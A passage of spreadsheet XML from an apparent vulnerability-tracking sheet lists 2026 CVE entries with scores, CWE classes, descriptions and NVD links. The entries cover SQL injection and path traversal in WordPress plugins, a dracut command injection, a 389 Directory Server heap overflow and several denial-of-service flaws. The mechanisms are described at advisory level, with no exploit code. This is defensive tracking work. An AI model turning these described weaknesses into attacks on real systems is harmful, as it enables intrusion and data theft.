          <t>In FIPS mode, Libreswan's add_decoded_cert() function calls CERT_ExtractPublicKey() and asserts that the result is not NULL. However, CERT_ExtractPublicKey() returns NULL when public key extraction fails, for example if the RSA exponent is set to 0. A remote attacker can send a malformed X.509 certificate in a CERT payload to trigger the assertion, causing the pluto daemon to abort and restart. Continued exploitation causes a denial of service. No remote code execution is possible. Both IKEv1 and IKEv2 are affected. The vulnerability is only exploitable when both the OS and libreswan are running in FIPS mode and at least one CA certificate is loaded. The CERT payload is processed before peer authentication, so no credentials are needed to exploit this. Configurations using only PreSharedKey (PSK) authentication with no CA certificates loaded in the NSS database are not vulnerable.</t>
        </is>
      </c>
      <c r="M2505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14957</t>
        </is>
      </c>
    </row>
    <row r="2506">
      <c r="A2506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15019</t>
        </is>
      </c>
      <c r="C2506" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2506" s="5" t="inlineStr"/>
      <c r="F2506" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2506" s="5" t="inlineStr"/>
      <c r="H2506" s="5" t="inlineStr"/>
      <c r="I2506" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2506" s="5" t="inlineStr"/>
      <c r="K2506" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2506" s="5" t="inlineStr">
        <is>
          <t>The Direct Download for WooCommerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.19 via the (top-level include) function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. The product ownership check only verifies that some free, virtual, downloadable product exists on the site — not that the requested file path belongs to that product's configured downloads — making exploitation viable on any WooCommerce site with at least one such product.</t>
        </is>
      </c>
      <c r="M2506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15019</t>
        </is>
      </c>
    </row>
    <row r="2507">
      <c r="A2507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-1519</t>
        </is>
      </c>
      <c r="C2507" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2507" s="5" t="inlineStr"/>
      <c r="F2507" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G2507" s="5" t="inlineStr"/>
      <c r="H2507" s="5" t="inlineStr">
        <is>
          <t>isc:bind</t>
        </is>
      </c>
      <c r="I2507" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J2507" s="5" t="inlineStr"/>
      <c r="K2507" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-770</t>
        </is>
      </c>
      <c r="L2507" s="5" t="inlineStr">
        <is>
          <t>If a BIND resolver is performing DNSSEC validation and encounters a maliciously crafted zone, the resolver may consume excessive CPU. Authoritative-only servers are generally unaffected, although there are circumstances where authoritative servers may make recursive queries (see: https://kb.isc.org/docs/why-does-my-authoritative-server-make-recursive-queries).
This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.46, 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.46-S1, and 9.20.9-S1 through 9.20.20-S1.</t>
        </is>
      </c>
      <c r="M2507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-1519</t>
        </is>
      </c>
    </row>
    <row r="2508">
      <c r="A2508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15406</t>
        </is>
      </c>
      <c r="C2508" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2508" s="5" t="inlineStr"/>
      <c r="F2508" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2508" s="5" t="inlineStr"/>
      <c r="H2508" s="5" t="inlineStr"/>
      <c r="I2508" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2508" s="5" t="inlineStr"/>
      <c r="K2508" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="L2508"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custom-level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M2508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15406</t>
        </is>
      </c>
    </row>
    <row r="2509">
      <c r="A2509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15462</t>
        </is>
      </c>
      <c r="C2509" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2509" s="5" t="inlineStr"/>
      <c r="F2509" s="5" t="inlineStr"/>
      <c r="G2509" s="5" t="inlineStr"/>
      <c r="H2509" s="5" t="inlineStr"/>
      <c r="I2509" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2509" s="5" t="inlineStr"/>
      <c r="K2509" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2509" s="5" t="inlineStr">
        <is>
          <t>The Sticky Chat Widget plugin for WordPress is vulnerable to SQL Injection via the 'scw_form_fields' parameter array keys of the 'scw_save_form_data' AJAX action in versions up to, and including, 1.4.2. This is due to the save_form_data() function passing attacker-controlled POST array keys unsanitized to $wpdb-&gt;insert(), which wraps column identifiers in backticks without escaping them, allowing a backtick in an attacker-supplied key to break out of the column-identifier list into raw SQL; additionally, the use of filter_input() bypasses WordPress's wp_magic_quotes() protection, and the widget_id validation loop is skipped entirely when no valid widget_id is supplied, leaving $isValid at 1. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="M2509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15462</t>
        </is>
      </c>
    </row>
    <row r="2510">
      <c r="A2510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15667</t>
        </is>
      </c>
      <c r="C2510" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2510" s="5" t="inlineStr"/>
      <c r="F2510" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2510" s="5" t="inlineStr"/>
      <c r="H2510" s="5" t="inlineStr"/>
      <c r="I2510" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2510" s="5" t="inlineStr"/>
      <c r="K2510" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="L2510"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contributor-level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 The etn_manage_event capability is assigned to Contributors by default, meaning any Contributor-level user can set the malicious event_layout value via the REST API without any additional configuration.</t>
        </is>
      </c>
      <c r="M2510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15667</t>
        </is>
      </c>
    </row>
    <row r="2511">
      <c r="A2511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15816</t>
        </is>
      </c>
      <c r="C2511" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2511" s="5" t="inlineStr"/>
      <c r="F2511" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2511" s="5" t="inlineStr"/>
      <c r="H2511" s="5" t="inlineStr"/>
      <c r="I2511" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2511" s="5" t="inlineStr"/>
      <c r="K2511" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2511" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in dracut. The die() error-handling function writes its message into a shell script under the initramfs emergency-hook directory without properly shell-quoting it. When the message contains data derived from the DHCP ROOT_PATH option, an attacker on the adjacent network who controls a rogue DHCP server can inject a command-substitution sequence that executes as root the next time dracut sources its emergency hook scripts during standard boot-failure handling.</t>
        </is>
      </c>
      <c r="M2511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15816</t>
        </is>
      </c>
    </row>
    <row r="2512">
      <c r="A2512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16025</t>
        </is>
      </c>
      <c r="C2512" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2512" s="5" t="inlineStr"/>
      <c r="F2512" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2512" s="5" t="inlineStr"/>
      <c r="H2512" s="5" t="inlineStr"/>
      <c r="I2512" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2512" s="5" t="inlineStr"/>
      <c r="K2512" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L2512" s="5" t="inlineStr">
        <is>
          <t>Improper validation of specified quantity in input vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Input Data Manipulation.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="M2512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16025</t>
        </is>
      </c>
    </row>
    <row r="2513">
      <c r="A2513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16028</t>
        </is>
      </c>
      <c r="C2513" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2513" s="5" t="inlineStr"/>
      <c r="F2513" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2513" s="5" t="inlineStr"/>
      <c r="H2513" s="5" t="inlineStr"/>
      <c r="I2513" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2513" s="5" t="inlineStr"/>
      <c r="K2513" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L2513" s="5" t="inlineStr">
        <is>
          <t>Protocol::HTTP2 versions before 1.14 for Perl allow memory exhaustion via closed streams that stream_state never removes from the connection stream table.
When a stream reaches the CLOSED state, stream_state returns the concurrency slot and clears most of the stream's keys, but the entry itself stays in the connection stream table and nothing in the distribution removes it. Stream identifiers increase monotonically, so a peer can open and close streams on one connection indefinitely, each close leaving a residual entry that is retained for the life of the connection.
SETTINGS_MAX_CONCURRENT_STREAMS does not bound this. That setting caps how many streams are live at once and is enforced, while the growth is made of streams the cap has already released, so it accumulates with concurrency never exceeding one. The client keeps the same table and grows the same way against a hostile server.
Measured against a server built on this module, roughly 920 bytes are retained per closed stream for about 19 bytes on the wire, so 100,000 sequential streams on one connection grow server resident memory by about 88 MiB. The streams are ordinary requests that the application accepts and completes.</t>
        </is>
      </c>
      <c r="M2513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16028</t>
        </is>
      </c>
    </row>
    <row r="2514">
      <c r="A2514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16037</t>
        </is>
      </c>
      <c r="C2514" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2514" s="5" t="inlineStr"/>
      <c r="F2514" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2514" s="5" t="inlineStr"/>
      <c r="H2514" s="5" t="inlineStr"/>
      <c r="I2514" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2514" s="5" t="inlineStr"/>
      <c r="K2514" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="L2514" s="5" t="inlineStr">
        <is>
          <t>Observable timing discrepancy vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Black Box Reverse Engineering.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="M2514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16037</t>
        </is>
      </c>
    </row>
    <row r="2515">
      <c r="A2515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16497</t>
        </is>
      </c>
      <c r="C2515" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2515" s="5" t="inlineStr"/>
      <c r="F2515" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2515" s="5" t="inlineStr"/>
      <c r="H2515" s="5" t="inlineStr"/>
      <c r="I2515" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2515" s="5" t="inlineStr"/>
      <c r="K2515" s="5" t="inlineStr">
        <is>
          <t>CWE-834</t>
        </is>
      </c>
      <c r="L2515" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could cause excessive iteration. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="M2515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16497</t>
        </is>
      </c>
    </row>
    <row r="2516">
      <c r="A2516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16960</t>
        </is>
      </c>
      <c r="C2516" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2516" s="5" t="inlineStr"/>
      <c r="F2516" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2516" s="5" t="inlineStr"/>
      <c r="H2516" s="5" t="inlineStr"/>
      <c r="I2516" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2516" s="5" t="inlineStr"/>
      <c r="K2516" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2516" s="5" t="inlineStr">
        <is>
          <t>The Loops &amp; Logic WordPress plugin before 4.3.0 does not restrict its public template-data action to the data a visitor is permitted to see, allowing unauthenticated users to read arbitrary user records (including email addresses and roles) and arbitrary site options.</t>
        </is>
      </c>
      <c r="M2516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16960</t>
        </is>
      </c>
    </row>
    <row r="2517">
      <c r="A2517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17255</t>
        </is>
      </c>
      <c r="C2517" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2517" s="5" t="inlineStr"/>
      <c r="F2517" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2517" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2517" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2517" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2517" s="5" t="inlineStr"/>
      <c r="K2517" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2517" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service due to improper validation of the prefix length in ICMPv6 Router Advertisements.</t>
        </is>
      </c>
      <c r="M2517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17255</t>
        </is>
      </c>
    </row>
    <row r="2518">
      <c r="A2518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17470</t>
        </is>
      </c>
      <c r="C2518" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2518" s="5" t="inlineStr"/>
      <c r="F2518" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2518" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2518" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2518" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2518" s="5" t="inlineStr"/>
      <c r="K2518" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2518" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service due to a buffer overflow.</t>
        </is>
      </c>
      <c r="M2518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17470</t>
        </is>
      </c>
    </row>
    <row r="2519">
      <c r="A2519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18056</t>
        </is>
      </c>
      <c r="C2519" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2519" s="5" t="inlineStr"/>
      <c r="F2519" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2519" s="5" t="inlineStr"/>
      <c r="H2519" s="5" t="inlineStr"/>
      <c r="I2519" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2519" s="5" t="inlineStr"/>
      <c r="K2519" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L2519" s="5" t="inlineStr">
        <is>
          <t>The HivePress Authentication plugin for WordPress is vulnerable to Authentication Bypass via the access_token parameter in all versions up to, and including, 1.1.4. This is due to the authenticate_user function's Facebook authenticator resolving third-party identity by forwarding the attacker-supplied access_token to the Facebook Graph API and trusting the returned email and ID verbatim, without performing any application ID or audience validation — specifically, no /debug_token verification and no comparison of the token's app_id against the configured hp_facebook_app_id. This makes it possible for unauthenticated attackers to authenticate as any existing WordPress user, including administrators, whose email address is associated with a Facebook account for which the attacker can obtain any valid access token. Important Note: To exploit the vulnerability, the attacker must obtain the victim's access token.</t>
        </is>
      </c>
      <c r="M2519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18056</t>
        </is>
      </c>
    </row>
    <row r="2520">
      <c r="A2520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18175</t>
        </is>
      </c>
      <c r="C2520" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2520" s="5" t="inlineStr"/>
      <c r="F2520" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2520" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2520" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2520" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2520" s="5" t="inlineStr"/>
      <c r="K2520" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L2520" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to manipulate database transactions due to improper authorization in the DDM target dispatcher.</t>
        </is>
      </c>
      <c r="M2520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18175</t>
        </is>
      </c>
    </row>
    <row r="2521">
      <c r="A2521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18355</t>
        </is>
      </c>
      <c r="C2521" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2521" s="5" t="inlineStr"/>
      <c r="F2521" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2521" s="5" t="inlineStr"/>
      <c r="H2521" s="5" t="inlineStr"/>
      <c r="I2521" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2521" s="5" t="inlineStr"/>
      <c r="K2521" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2521" s="5" t="inlineStr">
        <is>
          <t>A heap buffer overflow flaw was found in the SASL I/O layer of 389 Directory Server (389-ds-base). In sasl_io_start_packet(), the wrapped-record length read from the wire is validated only against an upper bound. A small wire length (0, 1, or 2) produces an encrypted_buffer_count below the already-consumed encrypted_buffer_offset, causing an unsigned subtraction underflow in sasl_io_read_packet(). PR_Recv is then requested to read approximately 4 GiB into a 1024-byte heap buffer, resulting in a heap buffer overflow with attacker-controlled content. After a successful SASL bind with integrity protection (SSF &gt; 0), a remote authenticated attacker can cause a denial of service or potentially achieve remote code execution. This flaw is distinct from CVE-2026-11774, whose fix only guards against upper-bound overflow.</t>
        </is>
      </c>
      <c r="M2521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18355</t>
        </is>
      </c>
    </row>
    <row r="2522">
      <c r="A2522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18453</t>
        </is>
      </c>
      <c r="C2522" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2522" s="5" t="inlineStr"/>
      <c r="F2522" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2522" s="5" t="inlineStr"/>
      <c r="H2522" s="5" t="inlineStr"/>
      <c r="I2522" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2522" s="5" t="inlineStr"/>
      <c r="K2522" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2522" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in 389 Directory Server. A missing NULL pointer check in the paged results handling of op_shared_search allows an unauthenticated remote attacker to crash the LDAP server by sending a crafted sequence of search requests using the USE_ONE_BACKEND control, resulting in denial of service.</t>
        </is>
      </c>
      <c r="M2522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18453</t>
        </is>
      </c>
    </row>
    <row r="2523">
      <c r="A2523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18561</t>
        </is>
      </c>
      <c r="C2523" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2523" s="5" t="inlineStr"/>
      <c r="F2523" s="5" t="inlineStr"/>
      <c r="G2523" s="5" t="inlineStr"/>
      <c r="H2523" s="5" t="inlineStr"/>
      <c r="I2523" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2523" s="5" t="inlineStr"/>
      <c r="K2523" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2523" s="5" t="inlineStr">
        <is>
          <t>The Unlimited Elements For Elementor plugin for WordPress is vulnerable to SQL Injection via the 'addontype' parameter in versions up to, and including, 2.0.16. This is due to insufficient escaping on the user-supplied parameter and the lack of sufficient preparation on the existing SQL query in the getWhereString() function; when the parameter is supplied as an array, element zero is used verbatim as the SQL comparison operator and concatenated into the WHERE clause without sanitization, while normalizeAjaxInputData() strips WordPress's magic_quotes protection from the value. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="M2523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18561</t>
        </is>
      </c>
    </row>
    <row r="2524">
      <c r="A2524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18611</t>
        </is>
      </c>
      <c r="C2524" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2524" s="5" t="inlineStr"/>
      <c r="F2524" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2524" s="5" t="inlineStr"/>
      <c r="H2524" s="5" t="inlineStr"/>
      <c r="I2524" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2524" s="5" t="inlineStr"/>
      <c r="K2524" s="5" t="inlineStr">
        <is>
          <t>CWE-338</t>
        </is>
      </c>
      <c r="L2524" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Data Science Pipelines Operator. This vulnerability allows an unauthenticated attacker to derive sensitive credentials, such as MariaDB root/user passwords and MinIO access/secret keys, if they can access the MinIO Route or MariaDB Service. The flaw occurs because the operator uses a cryptographically weak pseudo-random number generator (PRNG) to generate these credentials, making them predictable. Successful exploitation could lead to unauthorized access to all pipeline artifacts and metadata, resulting in significant information disclosure.</t>
        </is>
      </c>
      <c r="M2524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18611</t>
        </is>
      </c>
    </row>
    <row r="2525">
      <c r="A2525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18649</t>
        </is>
      </c>
      <c r="C2525" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2525" s="5" t="inlineStr"/>
      <c r="F2525" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2525" s="5" t="inlineStr"/>
      <c r="H2525" s="5" t="inlineStr"/>
      <c r="I2525" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2525" s="5" t="inlineStr"/>
      <c r="K2525" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2525" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the GStreamer gst-plugins-good package. The rtph264depay and rtph265depay RTP depayloader elements do not enforce a maximum size limit on the reassembly buffer used during fragmented RTP packet processing. A remote, unauthenticated attacker can send a continuous stream of RTP fragments without ever transmitting an end-of-fragment marker, causing the reassembly buffer to grow without bound until process memory is exhausted. This results in a denial of service through process termination.</t>
        </is>
      </c>
      <c r="M2525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18649</t>
        </is>
      </c>
    </row>
    <row r="2526">
      <c r="A2526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18672</t>
        </is>
      </c>
      <c r="C2526" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2526" s="5" t="inlineStr"/>
